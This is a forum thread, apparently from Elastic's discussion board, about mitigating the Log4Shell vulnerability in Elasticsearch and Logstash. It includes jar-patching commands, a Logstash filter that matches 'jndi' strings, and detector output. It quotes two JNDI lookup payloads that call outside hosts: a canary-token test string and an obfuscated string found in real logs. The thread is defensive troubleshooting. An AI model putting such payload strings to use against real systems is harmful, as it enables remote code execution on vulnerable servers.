Zero-day exploit in Log4j 2, which is part of Elasticsearch

  1. Is this a problem on Elastic Cloud for ES6 and ES7? (As I understand it, it is not.)
  2. Is this a problem on Elastic Cloud for clusters not yet upgraded (ES5)? I could not find any info on this (yes, upgrading to ES6/ES7 will be a priority this week...)

@elastic Thanks for all the effort you put into this. Please focus on making sure the patch works and fully covers Logstash, so we don't have to install 7.16.2 in a few days...

So is it possible to provide a SIEM rule which does not require the Elastic Endpoint Security agent process dataset? (See my previous post)

Thanks for the response.

Sorry, this post should have gone in the Logstash section. I will open a new thread there.

And yeah, I'm mostly interested in the best practices and how other plugins which may be affected plan to handle that.

As a workaround for Logstash, applying the following filter before attempting to parse the event seems to mitigate the issue.

  if "jndi:" in [message] {
    mutate {
      gsub => [
        "[message]", "jndi", "BLART"
      ]
    }
  }

Using the same testing approach you did, I can confirm that my canary token is NOT triggered if this appears before the json {} filter.

Logstash output

[2021-12-12T10:33:08,722][WARN ][logstash.filters.json    ][main][18d8528acb4b1628914404ffc234140d00f6c382fc7f21dbd350ac59bbd38fa5] Error parsing json {:source=>"message", :raw=>"${BLART:ldap://xxx.canarytokens.com/a}", :exception=>#<LogStash::Json::ParserError: Unrecognized token '$': was expecting ('true', 'false' or 'null')
 at [Source: (byte[])"${BLART:ldap://xxx.canarytokens.com/a}"; line: 1, column: 3]>}
{
          "host" => "c1523f8434cf",
       "message" => "${BLART:ldap://xxx.canarytokens.com/a}",
          "tags" => [
        [0] "_jsonparsefailure"
    ],
      "@version" => "1",
          "type" => "stdin",
    "@timestamp" => 2021-12-12T10:33:08.534Z
}

Does Logstash need to be restarted after running the following?

zip -q -d <LOGSTASH_HOME>/logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class

On a somewhat related note: you should also make sure that this command actually removes JndiLookup.class from the jar.

In my case, when testing it, that didn't happen: glob expansion didn't work correctly with zip, so I needed to specify the full path to the log4j jar.
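A minimal sketch of that approach (the install path is an assumption on my part; adjust it to your layout): let the shell resolve the glob to concrete jar paths and pass each one to zip explicitly.

  LOGSTASH_HOME=/usr/share/logstash   # adjust to your actual install path
  for jar in "$LOGSTASH_HOME"/logstash-core/lib/jars/log4j-core-2.*.jar; do
    # remove the JndiLookup class from each resolved jar
    zip -q -d "$jar" org/apache/logging/log4j/core/lookup/JndiLookup.class
  done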

Here is a temporary workaround I'm using (from Dockerfile):

# List the bundled log4j-core jars
RUN find /opt/logstash/ -name "*log4j*core*.jar" 2>&1
# Confirm the JNDI classes are present before patching
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi
# Strip JndiLookup.class from the core jar and from the copy bundled with the plugin
RUN zip -q -d /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
RUN zip -q -d /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
# Verify the class is no longer listed in either jar
RUN jar tf /opt/logstash/logstash-core/lib/jars/log4j-core-2.14.0.jar | grep -i jndi
RUN jar tf /opt/logstash/vendor/bundle/jruby/2.5.0/gems/logstash-output-test-0.2.0/vendor/bundle/jruby/2.5.0/gems/logstash-core-5.6.4-java/lib/org/apache/logging/log4j/log4j-core/2.6.2/log4j-core-2.6.2.jar | grep -i jndi

In my case, I also verify that the JndiLookup class has been correctly removed by grepping the jar contents before and after, and I also removed that class from the log4j-core jar that comes bundled with a plugin.
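If it helps, here is a rough sketch of that kind of check, assuming unzip is available and the /opt/logstash install path from the Dockerfile above; it scans every jar and reports any that still contain the class:

  find /opt/logstash -name '*.jar' -print0 | while IFS= read -r -d '' jar; do
    # list the jar contents and flag any jar that still ships JndiLookup
    if unzip -l "$jar" 2>/dev/null | grep -q 'JndiLookup.class'; then
      echo "JndiLookup.class still present in: $jar"
    fi
  done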

3 Likes

Thanks @Kami

@elastic Could you please update the Elastic Security Announcement for Log4Shell with updated commands to also remove the class from Logstash plugins etc., if necessary? And please let me know whether a Logstash restart is required after removing the class.

Please be aware that it's possible to trigger a JNDI lookup from an input plugin, before any filter kicks in; therefore, I'd refrain from relying on this workaround.
The only known mitigation until the release is out is to remove the class from the log4j jar as stated in the advisory.

3 Likes

@willemdh the advisory will be updated to note the need to restart after removing the class from the jar.

remove the class from Logstash plugins etc., if necessary?

This won't be necessary, as the loaded log4j-core jar is the one from logstash-core.
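If you want to double-check which log4j-core jar a running Logstash JVM actually has open, something like the following should do it as a quick sanity check (assuming lsof is installed on the host):

  lsof -p "$(pgrep -f logstash | head -n 1)" | grep log4j-core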

2 Likes

Please, how can I check exactly whether my self-hosted Elastic version is exploitable or not?

Be aware of obfuscation, though. I've found the following in my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"

so a query for the plain string doesn't match.
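If you are still using the gsub workaround from earlier in the thread, a slightly broader, case-insensitive match is sketched below; this is my own assumption, it still won't catch every obfuscation, and removing the JndiLookup class remains the real mitigation:

  # match the lookup syntax itself rather than a specific protocol string
  if [message] =~ /(?i)\$\{\s*jndi/ {
    mutate {
      gsub => [
        "[message]", "(?i)jndi", "BLART"
      ]
    }
  }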

Is there any indication when 7.16.1 is being released?

Edit: I read right over it, sorry. The target is today.

Based on the affected versions in the announcement, I would like to confirm that there is actually nothing to do if:

  1. the Elasticsearch version is 7.2+ with the bundled JDK 11+
  2. Logstash is 7.x with JDK 11.0.1+

Is that correct?
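For what it's worth, a quick way to see which JDK each component is actually running on (the paths assume the default package/Docker layouts and are only examples; adjust them to your install):

  /usr/share/elasticsearch/jdk/bin/java -version   # JDK bundled with Elasticsearch
  /usr/share/logstash/jdk/bin/java -version        # bundled JDK, if your Logstash version ships one
  java -version                                    # otherwise, the system JDK Logstash points at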

2 Likes

Looks like 7.16.1 is now released.

And when I tried to list the files inside the /usr/share/elasticsearch/lib directory, it seems the log4j-core JAR file has been removed from the distribution (at least from my observation inside the Docker image):

user@hostname:/usr/share/elasticsearch# ls -lah lib/
total 29M
dr-xr-xr-x. 3 root root 4.0K Dec 11 00:35 .
drwxrwxr-x. 1 root root   81 Dec 11 05:12 ..
-r--r--r--. 1 root root 112K May 11  2020 HdrHistogram-2.1.9.jar
-r--r--r--. 1 root root  14M Dec 11 00:30 elasticsearch-7.16.1.jar
-r--r--r--. 1 root root  27K Dec 11 00:30 elasticsearch-cli-7.16.1.jar
-r--r--r--. 1 root root  69K Dec 11 00:30 elasticsearch-core-7.16.1.jar
-r--r--r--. 1 root root  52K Dec 11 00:30 elasticsearch-geo-7.16.1.jar
-r--r--r--. 1 root root  43K Dec 11 00:32 elasticsearch-launchers-7.16.1.jar
-r--r--r--. 1 root root 1.6M Dec 11 00:31 elasticsearch-log4j-7.16.1.jar
-r--r--r--. 1 root root  28K Dec 11 00:30 elasticsearch-lz4-7.16.1.jar
-r--r--r--. 1 root root  14K Dec 11 00:30 elasticsearch-plugin-classloader-7.16.1.jar
-r--r--r--. 1 root root  19K Dec 11 00:30 elasticsearch-secure-sm-7.16.1.jar
-r--r--r--. 1 root root 154K Dec 11 00:30 elasticsearch-x-content-7.16.1.jar
-r--r--r--. 1 root root 1.2M May 11  2020 hppc-0.8.1.jar
-r--r--r--. 1 root root 342K May 11  2020 jackson-core-2.10.4.jar
-r--r--r--. 1 root root  58K May 11  2020 jackson-dataformat-cbor-2.10.4.jar
-r--r--r--. 1 root root  89K May 11  2020 jackson-dataformat-smile-2.10.4.jar
-r--r--r--. 1 root root  46K May 11  2020 jackson-dataformat-yaml-2.10.4.jar
-r--r--r--. 1 root root  17K Dec 11 00:32 java-version-checker-7.16.1.jar
-r--r--r--. 1 root root 1.7M Nov 24 09:22 jna-5.10.0.jar
-r--r--r--. 1 root root 630K May  4  2021 joda-time-2.10.10.jar
-r--r--r--. 1 root root  77K May 11  2020 jopt-simple-5.0.2.jar
-r--r--r--. 1 root root 258K May 11  2020 log4j-api-2.11.1.jar
-r--r--r--. 1 root root 1.8M Oct 20 23:41 lucene-analyzers-common-8.10.1.jar
-r--r--r--. 1 root root 152K Oct 20 23:41 lucene-backward-codecs-8.10.1.jar
-r--r--r--. 1 root root 3.5M Oct 20 23:41 lucene-core-8.10.1.jar
-r--r--r--. 1 root root  97K Oct 20 23:41 lucene-grouping-8.10.1.jar
-r--r--r--. 1 root root 206K Oct 20 23:41 lucene-highlighter-8.10.1.jar
-r--r--r--. 1 root root 149K Oct 20 23:41 lucene-join-8.10.1.jar
-r--r--r--. 1 root root  51K Oct 20 23:41 lucene-memory-8.10.1.jar
-r--r--r--. 1 root root 104K Oct 20 23:41 lucene-misc-8.10.1.jar
-r--r--r--. 1 root root 373K Oct 20 23:41 lucene-queries-8.10.1.jar
-r--r--r--. 1 root root 374K Oct 20 23:41 lucene-queryparser-8.10.1.jar
-r--r--r--. 1 root root 240K Oct 20 23:41 lucene-sandbox-8.10.1.jar
-r--r--r--. 1 root root 303K Oct 20 23:41 lucene-spatial3d-8.10.1.jar
-r--r--r--. 1 root root 245K Oct 20 23:41 lucene-suggest-8.10.1.jar
-r--r--r--. 1 root root 667K Jul  1 16:01 lz4-java-1.8.0.jar
-r--r--r--. 1 root root 302K May 11  2020 snakeyaml-1.26.jar
-r--r--r--. 1 root root  51K May 11  2020 t-digest-3.2.jar
dr-xr-xr-x. 6 root root   81 Dec 11 00:35 tools

So I assume that Elastic is mitigating this issue by removing that JAR file entirely?
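One way to see what that repackaged elasticsearch-log4j jar actually contains is to list it with the bundled JDK's jar tool and grep for JNDI classes, mirroring the checks used for Logstash above (run from /usr/share/elasticsearch; treat this as my own spot check):

  jdk/bin/jar tf lib/elasticsearch-log4j-7.16.1.jar | grep -i jndi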

Will the new Logstash 6.8.21 or 7.16.1 be supported with Elasticsearch 5.5.0 and 6.8.0?

1 Like

Is the ES-Hadoop connector affected by this issue?

I assume it is not affected, as it is a library and any logging would be done by the caller (i.e. Hadoop/Spark/Hive). But a confirmation would be good.
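A quick sanity check one could run in the meantime (assuming a JDK's jar tool is on the PATH; the glob is just an example, point it at whichever elasticsearch-hadoop artifact you deploy) is to list the connector jar and look for bundled log4j classes:

  jar tf elasticsearch-hadoop-*.jar | grep -iE 'log4j|jndilookup'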

Thanks.

I tried running https://github.com/mergebase/log4j-detector over it, and this is my result:

(gotti@plattfisch 796) docker run --rm -it --entrypoint bash docker.elastic.co/elasticsearch/elasticsearch:7.16.1
root@95841cb1bcd7:/usr/share/elasticsearch# ls
LICENSE.txt  NOTICE.txt  README.asciidoc  bin  config  data  jdk  lib  logs  modules  plugins
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/ja
jar        jarsigner  java       javac      javadoc    javap
root@95841cb1bcd7:/usr/share/elasticsearch# jdk/bin/java -jar /tmp/log4j-detector-2021.12.12.jar .
-- Analyzing paths (could take a long time).
-- Note: specify the '--verbose' flag to have every file examined printed to STDERR.
./bin/elasticsearch-sql-cli-7.16.1.jar contains Log4J-2.x   >= 2.10.0 _VULNERABLE_ :-(
./lib/elasticsearch-log4j-7.16.1.jar contains Log4J-2.x   <= 2.0-beta8 _POTENTIALLY_SAFE_ :-|
root@95841cb1bcd7:/usr/share/elasticsearch#

Looks like the vulnerability is only partially fixed ...
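As a stopgap, I'd assume the same class-removal approach from the advisory could be applied to the flagged jar as well, though that is my own assumption rather than official guidance (back the jar up first, and note that zip may need to be installed in the image):

  zip -q -d /usr/share/elasticsearch/bin/elasticsearch-sql-cli-7.16.1.jar org/apache/logging/log4j/core/lookup/JndiLookup.class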

3 Likes

We have successfully mitigated it. Just follow the links below:

https://dlcdn.apache.org/logging/log4j/2.15.0/apache-log4j-2.15.0-bin.tar.gz

https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.html

For more details, feel free to connect. Cheers!

Regards,
Amit Potdar

How do we fix this Log4j issue if we have installed Elasticsearch through a package?
Do you provide any steps to resolve this issue and upgrade to the latest version?

Is there a way to download Elasticsearch 6.8.21? The link from the download page currently gives a 404.